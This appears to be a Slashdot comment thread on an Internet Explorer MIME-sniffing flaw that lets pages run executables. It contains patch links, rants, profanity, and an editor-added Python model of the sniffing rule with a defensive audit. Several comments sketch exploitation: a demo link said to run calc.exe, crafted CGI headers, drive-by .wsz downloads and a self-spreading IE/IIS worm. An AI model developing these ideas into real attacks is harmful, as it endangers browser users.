good thing this information hasn't been released to the public.....doh!!!!
(disclaimer: yes, I did read the article). In general, MS seems to care not that much about IE/Outlook security (see reluctance to provide no-HTML patch to Outlook). But see today's other articles: MS cares quite a bit about digital rights management, and getting their finger in the pie for music and video. So: emphasize to gates & co that rogue software could get in through Outlook, execute on the client machine, and crack and make copies of video, and WMP files. Better yet, have some Russian guy write a virus that cracks all your DRM-covered files, places them in your share folder, signs you up to Morpheus (if you're not already); and finally sends itself to your address list. RIAA/MPAA: MS, you gotta stop this! Plug those browser holes NOW!
Trust me it's a lot easier to support clueless users in Linux since they don't have access to destroy the machine anymore.
UI can be just as userfriendly. I had to do that after people kept taking out my windows install by accident (at least once a month)
Last I checked, "possession of stolen property" was still a crime.
I'm talking about LAW. Not hyperbole. Not your fantasy. the LAW. No where, no where at all, in any law, is copyrighted material considered "stolen" The fact that you equivocate "copyright violation" with theft does not have any bearing on the LAW.
Last I checked...
If you're so good at 'checking' why don't you look it up and see for your own god damn self. Then come back and show us all where it says that possessing copyright infringed property is the same as possessing 'stolen' material.
autopr0n is like, down and stuff.
You can fix that in the display settings. Set "Windows and buttons" to "Windows classic style". You have to turn off the green start button separately for some reason, I guess they were especially fond of that for some reason.
so he's gonna get fired from school?
"Remember when the U.S. had a drug problem, and then we declared a War On Drugs, and now you can't buy drugs anymore?"
I am not sure this is very practical for win9x/winXP home users, as they do not even know they are "logged in". Especially for 9x, since it isn't multiuser and doesn't enforce even the most basic security policy. XP home users don't have to put in a password to log on, and if I am correct, have administrative privileges.(feel free to correct me if I'm wrong here) Not sure what the best solution here is though, since MS users are less than security conscious anyhow and typically don't patch their computers. (How many systems have you seen that had virus defs that were 2 years old?)
it's illegal to exploit this to do anything bad, isn't it? anybody who tries, will be hunted down and punished -- but punished real bad -- with the help of the new anti-terror legislation. i am sure MS has a reason why it has been designed like this and probably it is a good reason. maybe they will even tell us some day what those good reasons are. maybe it is better for us not to know. a company that big with that many programmers working millions of manyears to improve their state-of-the-art products certainly doesn't let this happen by oversight. i therefore assure you: relax, all is well, there is no need to worry.
Interesting point.
Bush's education improvements were
You were very quick to be hostile. Sometimes I don't have control over the operating system used by my customers.
I posted the fix on another thread on this article.
--corky6921
What about the IE de-integration done by Win98 Lite? Does it stymie this vulnerability?
The way the article was worded, web sites and emails could just automatically start executing native code.
Because it's part of the Windows OS. When grandma goes out to buy herself a nice Dell computer, it comes with Windows preinstalled, and hence has IE installed by default. She would have to take extra steps to download and install a different browser. But why, when IE seems perfectly fine, and it's integrated so nicely into the desktop? And it's hard to argue that. Think of the average home user that isn't as aware of these issues as we are.
But don't you see? This security hole is the solution. The exploit can be used to install another browser. This bug should remain unpatched as part of the settlement in the Microsoft case.
Basically, the first 256 bytes of the file are scanned, and compared with the Content-Type header. If the two results do not agree, the scanned type is used. If the scanned type is ambiguous, and the file is binary, then the user is prompted to save or execute the file. If the file is text, it is displayed.
Now, can someone explain what is wrong with these instructions that would cause executable content to be automatically executed? The text even gives an example of a file extension of .DLL and .BAT, and how those would be handled.
If history repeats itself, I think this is how it will happen. Microsoft may release a bugfix in the next few months. However, they won't publicize it much, partially due to the fact that they don't even think it's a bug. Eventually, I'd say three months later, a virus creator stumbles along this bug, makes a virus like Code Red, and then it gets big media coverage, while everyone tries to patch their systems.
This readme describes how the vulnerability works.
;)
No, really it will download and execute calc.exe from a Win98SE install. Of course, since it could be any program, including trojans or viruses, you'd have to trust me. Doesn't that suck?
http://donkeynuts.org/readme.txt
how big an idiot he really is.
glrotate
sure would be nice to have a squelch command for some users.
People should know IE will always be insecure....That's why I went back to Nutscrape but I guess it only has a slightly smaller amount of security issues.
"I disapprove of what you say, but I will defend to the death your right to say it." - Voltaire
Well, with IE 5.5sp2(NT4.0), the vulnerability works exactly as described in the article.
What crackhead moderator labeled this as "informative"?!
It continues to amaze me that MS products are being used in shops more and more every day where security is even remotely an issue. Not to mention any federal government agencies. I'm nearly convinced that there is no hope and that most IT departments are led by brainwashed invalids who should be fired for incompetence. In fact any IT manager who continues to put out MS products on corporate desktops, knowing the track record in the "non-security area", should be brought up on criminal neglect charges. They should have to pay damages for every virus that enters their company through one of the many open doors in the MS software that are left wide open without concern.
I realize MCSEs are a dime-a-dozen but I have to think at least *some* of them have the capacity to be retrained and put to better use than chasing the rabbit around the dog track.
I've actually been hit with some virii spread in e-mail because of MS Exchange automatically viewing the file as HTML. The "re-typed" content type is often of the music variety ".wav" with an executable payload that does malicious things.
Thankfully I have the security screws tightened down as far as they go in MS Exchange and the virii have never done anything to my computer or spread beyond me. (At least to the best of my knowledge)
42 - So long and thanks for all the fish.
Novice users will take you literally. It happened to me.
My first month on the job, for an employer who made us peons use communal banks of PCs. Someone two seats away was running WordPerfect 5.1, and asked me "How do I save this file?"
I answered "Control Alt Delete," and before I could stop her, she'd rebooted her machine.
But of course, IE isn't software for productive work...
I can see the fnords!
...but sometimes I fantasize about someone writing a really really mean, evil microsoft virus from hell so people understand what's really at stake here. ...of billions of money!
I mean we're talking billions of billions of billions of billions...
get xited
Try this too:
If a page is called '.txt' and mime-type is text/plain, MSIE will *still* treat it as HTML, if it "looks like" HTML source.
See this for example, or if you want to be naughtier, try this for a crash.
Make even shorter URLs - 8LN.org
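The two observations above (the earlier comment that IE scans the first 256 bytes and lets the sniffed type override the Content-Type header, and this one that a text/plain page is rendered as HTML when it "looks like" HTML) can be modelled in a few lines. The following is an added example written for this page, not code from any poster or from Microsoft: the signature table, the extension map and the function names are the editor's own simplification, not IE's real tables. It also includes a gateway-style audit that reports every disagreement between the three signals a browser might use (header, extension, content), which is the check a defender would run on outgoing or proxied responses.

```python
"""Model of the content-sniffing rule described in the thread, plus a
gateway check that flags responses whose declared Content-Type, file
extension and sniffed content disagree.  Added example; the signature
table below is a constructed simplification, not IE's real one."""
from __future__ import annotations

import os

SNIFF_WINDOW = 256  # the post says the first 256 bytes are examined

# Constructed, deliberately small signature table (assumption, not IE's).
MAGIC = [
    (b"MZ", "application/x-msdownload"),          # DOS/PE executable header
    (b"\x89PNG\r\n\x1a\n", "image/png"),
    (b"GIF87a", "image/gif"),
    (b"GIF89a", "image/gif"),
    (b"RIFF", "audio/x-wav"),                     # RIFF container; good enough here
]
HTML_MARKERS = (b"<!doctype html", b"<html", b"<head", b"<body", b"<script", b"<title")

# Extension-to-type map, again a constructed subset for the example.
EXT_TYPES = {
    ".txt": "text/plain", ".htm": "text/html", ".html": "text/html",
    ".png": "image/png", ".gif": "image/gif", ".wav": "audio/x-wav",
    ".exe": "application/x-msdownload", ".bat": "application/x-msdownload",
    ".dll": "application/x-msdownload",
}
TEXT_TYPES = {"text/plain", "text/html"}
EXEC_TYPES = {"application/x-msdownload"}


def looks_binary(head: bytes) -> bool:
    """Treat NUL or non-whitespace control bytes as evidence of binary data."""
    return any(b == 0 or (b < 32 and b not in (9, 10, 13)) for b in head)


def sniff_type(body: bytes) -> str:
    """Guess a type from the first SNIFF_WINDOW bytes, as the post describes."""
    head = body[:SNIFF_WINDOW]
    for magic, mime in MAGIC:
        if head.startswith(magic):
            return mime
    if head.lstrip().lower().startswith(HTML_MARKERS):
        return "text/html"          # this is the text/plain-looks-like-HTML case
    if looks_binary(head):
        return "application/octet-stream"   # binary, but no known signature
    return "text/plain"


def resolve(declared: str, body: bytes) -> tuple[str, str]:
    """Apply the rule from the post: the sniffed type wins when it disagrees
    with the declared Content-Type; text is displayed, anything else prompts."""
    sniffed = sniff_type(body)
    effective = sniffed if sniffed != declared else declared
    action = "display" if effective in TEXT_TYPES else "prompt"
    return effective, action


def audit_response(declared: str, filename: str, body: bytes) -> list[str]:
    """Gateway-side check: report each disagreement between header, extension
    and content.  Any finding is a response worth blocking or logging."""
    findings = []
    ext = os.path.splitext(filename)[1].lower()
    by_ext = EXT_TYPES.get(ext)
    sniffed = sniff_type(body)
    if sniffed != declared:
        findings.append(f"content sniffs as {sniffed} but Content-Type says {declared}")
    if by_ext and by_ext != declared:
        findings.append(f"extension {ext} implies {by_ext} but Content-Type says {declared}")
    if sniffed in EXEC_TYPES and by_ext not in EXEC_TYPES:
        findings.append(f"executable signature delivered under extension {ext!r}")
    return findings


if __name__ == "__main__":
    # Constructed sample responses, not captured traffic.
    samples = [
        ("text/plain", "notes.txt", b"<html><body>plain text?</body></html>"),
        ("audio/x-wav", "song.wav", b"MZ\x90\x00\x03\x00\x00\x00"),
        ("text/html", "index.html", b"<!DOCTYPE html><html></html>"),
    ]
    for declared, name, body in samples:
        print(name, resolve(declared, body), audit_response(declared, name, body))
```

The point the model makes visible is that the declared header never protects the user on its own: `resolve("text/plain", ...)` on an HTML-looking body returns `text/html`, so the file is rendered, and a body with an executable signature under a `.wav` name is reported twice by `audit_response`, once for the header mismatch and once for the executable content under a non-executable extension.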
This keeps happening to me. I'm driving and a report on a new, horrible "computer virus" starts coming over the radio....or I see a scary article in the newspaper on how evil "hackers" can take over my computer just by sending me an email. Naturally, I am all ears (or eyes). Then, at the end of the piece, I am scratching my head. What was that about? Then it hits me - this is only about Windows machines, nothing to do with me. They didn't say so, because for these computer "journalists," "computer" means "computer running Windows." And further, although I know little about that particular operating system, I know that the so-called security hole just doesn't exist for users who have simply turned off the automatic execution of scripts, and who do not respond to invitations to run programs that they have not installed themselves by clicking "Sure!". I use Internet Explorer, at times, on my Macs, and I know there is a supposed similar "vulnerability," but I'm not worried, because I've set it, as well as any other browser I might use, to not post-process files. All of these hand-wringing articles give the impression that there is little the poor user can do, at least until some commercial virus protection software is updated. They never mention that he can either stop using Windows, or learn how to use it intelligently. My point? I thought the articles about computer-related subjects on Slashdot were supposed to be a bit more sophisticated than what you might find in a newspaper.
"Computer illiteracy is usually not about a lack of skill, but a fear that it is impossible to learn a computer skill. It is an acquired behavior."
Agreed, but it's damn hard to get people to unlearn that fear. And that's the problem.
I'm the stranger...posting to
I use Netscape 4.7 at home and Mozilla at work. But I have to have IE installed and configured on both boxes because there are sites which don't work in those browsers. Some of them just plain won't render the page, instead saying "Document: Done" while displaying a blank page. One of those sites was done in PHP ferchrissake.
Bite the hand.
Please...Wu-FTP is flawed all over the place. I think most of the distros have already given up on it because it's too slow to give out the patches and there are too many buggy routines (which return root-exploit after root-exploit).
And you can't really blame "Linux" in general over a third-party application's buggy code. As for Windows, it is indeed Microsoft who controls and maintains the code. Not to say that the open-source community doesn't run into its own serious bugs, but in general, we tend to report them a lot faster than the MS crew.
Zodiac Survey
How do you think they got the name "Microsoft?"
Oh when Mozilla & Opera had security holes in previous builds, SlashFuckheads didn't report it, nor did they report any security holes within CDE/Solaris platform when I posted the news. These slashfukkers are biased cunts and fuck you guys all to hell. Try and be open minded and not attack Microsoft All The TIME!!!!! You think that Bill Gates-Borg icon is funny, it's getting tiresome and grow up!! If you want to generalize and be pig headed, I notice all the Linux students at my University look like Cowboy Neal -- TOTAL FAT FUCKERS with no life!! Why not use Cowboy Neal with that fuckin Tux Hat as an icon for Linux News you bitches!!!! http://www.cowboyneal.org/ Check out the LOSER!
No, it doesn't. I just printed something from opera, default settings, and it came out fine. I'm using version 6 on win2k.
Microsoft may not have won the browser market fairly, but that doesn't take away from IE's strength.
Yes, it does. Certainly in my opinion at least.
You cannot claim victory when the referees have thrown down the penalty flags against you.
And IE has NO "strength" whatsoever on the Linux platform since it does not run there. In order to even be eligible for the distinction "WWW's Greatest Browser(tm)" you simply _have_ to be cross-platform. Cross-platform functionality is the foundation of the Internet.
IE violates this. It is therefore NOT the Web's Greatest Browser no matter how many people buy computers with it preinstalled.
Exceeding the recommended torque is not recommended.
I just hope that nobody remembers to create a hybrid virus that spreads using both IE browsers and IIS servers, exploiting this fail and the ones from Code Red/Nimda/etc.
Just imagine a Code Red-like virus that posts web pages in hundreds of unpatched websites containing another virus that would attack IE browsers, that would spread again to IIS servers that would spread...
Couldn't a webcrawler be taught to search for this exploit in the wild?
[news for me, stuff that doesn't matter]
Just curious why you would choose to write a temporary local file when you could just use "print $content" where it says "fopen... fpassthru..."?
-- thinkyhead software and media
Winamp is probably one of the most commonly used pieces of Windows software available. And might I point out, that it adds a mime type (or something) to windows' system that tells windows to automatically open the document when finished.
I tested it myself, I have Xitami on my Windoze machine, and renamed a binary to test.wsz. It downloaded and opened automatically (so fast I couldn't have canceled had I wanted to; but that's because I was downloading from my own machine, but it's very possible to make it run fast even on a remote server, especially if you target a broadband user.) Now since it opened to Winamp it obviously wasn't executed (just seemed to cause Winamp to refresh its display.)
But I wonder, could there be a way to combine these two? Then the victims wouldn't have to do anything except load your page. Everything else could be made to happen so quickly they may not even notice!
Also when downloading a WSZ file, you aren't even prompted to do any of the following:
Whether or not to open
Where to save it
What it should be named
Or to close the download dialog automatically
Obviously a person could write a very small binary and download it to a person's computer in seconds. It still has to be determined if a binary can be executed this way though.
These two ISPs have those gay interfaces that load up content using MSIE automatically. Almost everyone who uses those services just browses within the AOL / CS2K window, which is just a wrapper for MSIE, AIM, their email client, etc.
Those users are pretty much fucked. I suppose if you're a hacker you know who to target now.
With text/plain it simply treated it like a normal .exe file. (asked if I wanted to save/open whatever)
autopr0n is like, down and stuff.
Opera 5.12 is also vulnerable. Check the following link: http://www.securityfocus.com/archive/1/244953 If you already have 6.0, then you should be safe, but apparently, the same is true of IE 6.0, which has been quite thoroughly tested and does show the appropriate .exe on the second dialog.
Sorry if this information is redundant, but obviously, someone did not see it. Apparently, this security vulnerability has been known by the IE and Opera gang for a while, or why do you think that the 6.0 versions would have already solved the problems?
QuadGoatBoy
"I have lost many friends to the squirrels..."
No one paid for netscape.
Perfect timing! I was just wondering how to "write" an Excel file & send it to a browser.
The actual content-type flag is "application/vnd.ms-excel"
Thanks!
Eel
This sensationalized story is nothing more than Microsoft-bashing.
That wasn't a joke. :-)
Slashdot? Oh, I just read it for the articles.
Really, READ the EULA, any EULA.
As things stand now it's totally one-sided:
You have the right to PAY for "the software". That's all. Don't expect it to run. You're responsible for installing it correctly and making it work for you, but you're not allowed to reverse engineer the program and fix it if it doesn't work right. You also have the right to pay for the lawyers if the developer decides to come after you for any reason, no matter what the outcome of the action. The developer has the right to snoop around your system to make sure you have a legitimate license and disable any of his software which he thinks you haven't legally obtained. If this shuts down your business and you lose $100,000/diem for the 2 days it takes you to cut a deal with his salesman and the 3 days it takes to reinstall his software, too bad. If you can come up with the receipts to PROVE you've paid, you still have no legal recourse against the developer. If you badmouth the developer because he shut down your paid-for software until you exercised your right to PAY a second time, or because his crapware is a piece of shit, you're in violation of the EULA, and you're paying for the lawyers he'll send after you!
</RANT>
If the goalies & the pitchers got to make up ALL the rules, no one would ever score!
We need some middle ground.
Maybe if the developers were responsible for treble the retail price of their software. A little guy wouldn't be burned at the stake if somebody's business went down the drain, FREE software would be left out because its retail price is $0, but the Empire might take a hit in the class-action suits that vulnerabilities of the magnitude being discussed here would cause.
Imagine the Empire being made to refund $550/copy for a million copies of software that were found vulnerable to a virus that deleted all data from the customers' disks. That might put a crimp in their monopoly. It would _certainly_ give FREE software a chance on the desktop!
To: Chris Wysopal
Re: Recent comment to newsbytes and other news services.
http://www.newsbytes.com/news/01/172878.html
In a statement attributed to you on newsbytes, they claim you said that malicious hackers would need control of an httpd server to use this exploit. This is very untrue. Using this exploit is far simpler than that.
All a malicious hacker would need is a normal web account with any ISP. Normal web accounts generally allow cgi-bin access for that account. A simple cgi script could utilize this exploit, as all cgi scripts that communicate with the browser, by design, should send headers. This isn't usually *necessary* as most web servers generally will create the header as needed (assuming it understands the content generated by the cgi script), but is how cgi works.
If, for example, you have ever been to a site where an image is being displayed as plain text, or a download of an exe file or zip file or other understood format is garbled, *when those files are sent via script*, it is often because the script creator forgot to send a header before the data and the web server treats and sends the file as plain text.
Thus, to use this exploit, anyone with a real, full web account with any decent ISP would simply need some scripting knowledge (being a "malicious hacker" sort of implies that), and knowledge of the appropriate header to send.
Our best,
Robert
cc: SlashDot
NewsBytes/Brian McWilliams
WebMaster:
BinFeeds
XXX Thumbnailed Image Newsgroups but
I want someone to post the link where if I browse to the link http://www.xxx.xxx/blah.htm I get a new file created on my disk. I challenge anyone to create such a link to exploit this security hole that would create the file slashdot.txt in C:/tmp (OK you don't have to create the directory too). I leave this as an exercise for the student. IF someone is bright enough to create this link, I would be happy to go there and verify that this is a bug. In the meantime, I'm using Opera. This would do more to support the bug weakness than any of these posts.
Ross Youngblood
Oh, OK, sure, flame me into karma hell
but isn't this a patch?
--
greenpeace++
For those who aren't aware, MS does have a fix available for this problem. Their remark about not considering it a problem apparently applied to an earlier, less severe, version of the problem, which didn't allow random programs to be run without notice.
The fix, which was posted on December 13 (yes, almost a week ago, and before this article was posted), is located at http://www.microsoft.com/technet/security/bulletin/MS01-058.asp
One had IE 5.5 SP2 and one IE6. When I tried to run the 5.5 SP2 patch on the IE 5.5 SP2 computer I got a message which said: "This patch will only work with the SP2 version of Internet Explorer 5.5". DOH!!! The IE 6 patch installed on the IE 6 computer, but now Internet Explorer crashes continually! And..you can't uninstall these patches either. So...apply these patches with caution. Looks like Microsoft has DONE IT AGAIN!!!
It's so hard to find good flamebait in the form of a story these days... oh wait, not on Slashdot. The "story", if you want to call it one, is riddled with assumptions. I'm tired of people attacking Microsoft as if it were just some entity that they didn't like. Bill Gates is not an evil monster and Microsoft is not the evil empire everyone here for some reason wants them to be. These are people who have ideas about how things should be. Good for them for bucking the system!
SL33ZE - Artificial Intelligence is No Match For Natural Stupidity -
No troubles with that un!